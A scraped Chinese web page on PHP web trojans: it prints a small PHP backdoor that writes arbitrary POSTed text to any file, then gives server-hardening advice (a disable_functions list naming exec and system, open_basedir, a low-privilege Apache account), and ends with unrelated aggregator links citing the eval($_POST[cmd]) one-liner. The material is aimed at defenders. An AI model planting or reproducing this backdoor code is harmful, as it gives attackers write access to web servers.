php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。

php网页木马

header("content-Type: text/html; charset=gb2312");

if(get_magic_quotes_gpc())foreach($_POSTas$k=>$v)$_POST[$k] =stripslashes($v);

?>

保存文件名: ">

if(isset($_POST['file']))

{

$fp= @fopen($_POST['file'],'wb');

echo@fwrite($fp,$_POST['text']) ?'保存成功!':'保存失败!';

@fclose($fp);

}

?>

一句话php木马

PHP木马的防范方法

PHP是能让你生成动态网页的工具之一。PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。

PHP代表,超文本预处理器(PHP: Hypertext

Preprocessor),可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可(GPL),在这一许可下诞生了许多流行的软件诸如Linux和Emacs。PHP在大多数Unix平台,GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。

PHP的另一好处就在于他的安全性,随着现在互联网的发展,网络安全越来越受重视,PHP的诞生几乎代替了ASP,因为PHP对于安全方面的设置是极为简单的不像ASP那样需要很多的步骤,和禁用很多的服务。不过再好的东西也始终会有不足,如果默认设置的PHP同意也是不堪一击,因此本文就来讲一下如何对PHP进行一些安全方面的配置,来防止脚本木马的破坏。

一、防止php木马执行webshell

打开safe_mode, 在,php.ini中设置 disable_functions=

passthru,exec,shell_exec,system

二者选一即可,也可都选。

二、防止跳出web目录

首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行:

php_admin_value open_basedir /usr/local/apache/htdocs

,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误:

Warning: open_basedir restriction in effect. File is in wrong

directory in /usr/local/apache/htdocs/open.php on line 4

等等。

三、防止php木马读写文件目录

在php.ini中的 disable_functions= passthru,exec,shell_exec,system

后面加上php处理文件的函数,主要有

fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile

。即成为 disable_functions=

passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir

,fopen,fread,fclose,fwrite,file_exists

,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile

ok,大功告成,php木马拿我们没辙了,遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。

如果是在windos平台下搭建的apache还需要注意一点,apache默认运行是system权限,必须给apache降降权限,如下:

net user apache f**kmicrosoft

/add

net localgroup users apache /del

此时建立了一个不属于任何组的用户apche,只要打开计算机管理器-服务-apache服务的属性-log on-this

account,在这里填入上面所建立的账户和密码,重启apache服务即可实现apache运行在低权限下。

总结:实际上还可以通过设置各个文件夹的权限,给每一个目录建立一个单独能读写的用户,来实现安全。当前很多虚拟主机提供商的流行配置方法,不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识,相对的禁闭不用的功能就可以保证网络安全的威胁。

下面是mcafee的安全设置,防止一些网页木马生成文件等。

http://www.jb51.net/hack/list461_1.html

php post cmd,[转载]?php eval($_POST[cmd]);?一句话木马解读相关推荐

  1. php eval一句话木马干啥的,?php eval($_POST[cmd]);?一句话木马解读

    php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件.并在php.ini中设置一下. php网页木马 header( ...

  2. 一句话木马@eval($_POST[“cmd“]);是什么意思(超详细)

    在文件上传(upload)类ctf题中,相信大家都接触过一句话木马 <?php @eval($_POST["cmd"]); ?> 那么具体它是扫描意思呢 POST 是h ...

  3. CDays–2 完成核心功能 CMD模块 Python基础教程 cmd cli

    再过两个CDays我们就完成了所有的功能了,不过是在CMD中运行的. 为了模块化我们的程序,我们先整理一下以前的程序. # -*- coding: utf-8 -*- import os def cd ...

  4. php一句话木马调用cmd命令,一句话木马(webshell)是如何执行命令的

    在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就 ...

  5. java cmd 等待输入_JAVA:调用cmd指令(支持多次手工输入)

    1 packagecom.le.tool;2 3 importjava.io.BufferedReader;4 importjava.io.File;5 importjava.io.IOExcepti ...

  6. Win10--在右键菜单中添加cmd.exe(在此处打开CMD窗口)

    原文网址:Win10--在右键菜单中添加cmd.exe(在此处打开CMD窗口)_IT利刃出鞘的博客-CSDN博客 简介 说明 本文介绍Windows10如何在右键菜单中添加cmd.exe(在此处打开C ...

  7. CMD命令速查手册 cmd命令大全

    CMD命令速查手册 cmd命令大全 cmd命令详解如果你想了解本页面是怎么来的 请下载批处理代码 到--其他\CMD命令速查手册 运行 就可以得到本页面 CMD 命令速查手册 雪深 - 2009-03 ...

  8. Steam CMD是什么?Steam CMD怎么用?

    Steam CMD是什么?Steam CMD怎么用? SteamCMD是什么? SteamCMD使用教程 1.Windows 2.Linux使用命令设置SteamCMD SteamCMD是什么? 在自 ...

  9. 今天给大家分享电脑cmd命令大全,使用cmd命令可以高效的对电脑进行配置或者快速打开自己需要的服务,有需要的朋友赶紧收藏吧!

    今天给大家分享电脑cmd命令大全,使用cmd命令可以高效的对电脑进行配置或者快速打开自己需要的服务,有需要的朋友赶紧收藏吧! 功能说明 cmd命令 组策略 gpedit.msc 控制面板 contro ...

最新文章

  1. 词袋模型(bag of words)构建实战
  2. 5GS 协议栈 — PFCP 协议 — URR 用量上报规则
  3. 算法谜题 php,JavaScript实现N皇后问题算法谜题解答_javascript技巧
  4. android4.0.3源码之鼠标光标绘制简略版
  5. 成功解决RuntimeError: Selected KDE bandwidth is 0. Cannot estiamte density
  6. c语言也能用模板方法模式?
  7. 同一交换机的不同VLAN如何隔离?
  8. 教你如何制作饼干icon教程
  9. Fedora10使用若干问题
  10. CSS三大特性的利用注意事项
  11. CF280C Game on tree(期望dp)
  12. LINUX SHELL中echo如何处理特殊字符
  13. 立创商城的元件原理图怎么弄到ad_(50条消息)立创EDA元件封装导入AD软件教程
  14. 视频教程-Linux C语言编程基础视频精讲-C/C++
  15. 【工具】Alfred2.5.1使用全攻略!神一样的Mac app!(神一样的搜索)(推荐)
  16. 企业管理软件,真的以业务流程为中心?
  17. Linux 网络命令大全
  18. 医院客户关系管理/医院随访/CRM/HCRM
  19. 大学Python编程试卷真题!用python循环,输出1+11+111+1111+11111的值
  20. 录屏程序之屏幕实时录制保存成AVI视频文件

热门文章

  1. 牛客网(剑指offer) 第四题 重建二叉树
  2. iis websocket同时连线人数_【NBA云专访】沈洋连线76人CEO 疫情期间如何管理球队?...
  3. iOS逆向之Protocol Witness Table的汇编实现原理
  4. HarmonyOS之深入解析WLAN的功能和使用
  5. 《数据库原理与应用》(第三版)第12章 函数和游标 基础 习题参考答案
  6. 13.2.7 中间件
  7. Ubuntu系发行版安装deepin wine QQ的步骤
  8. VS2017断点调试
  9. 【Linux系统编程】IO多路复用之epoll
  10. 【Linux】一步一步学Linux——ncat命令(159)